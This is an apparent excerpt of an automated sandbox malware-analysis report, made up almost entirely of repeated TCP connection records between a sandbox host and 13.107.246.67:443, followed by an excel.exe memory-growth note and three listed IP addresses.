Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49705
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49705
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49706
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49706
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49706
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49706
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49706
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49705
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49705
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49706
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49706
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49706
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49706
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49706
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49705
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49705
Source: excel.exeMemory has grown: Private usage: 2MB later: 83MB
Source: Joe Sandbox ViewIP Address: 3.39.89.152 3.39.89.152
Source: Joe Sandbox ViewIP Address: 13.107.246.67 13.107.246.67
Source: Joe Sandbox ViewIP Address: 5.161.200.29 5.161.200.29
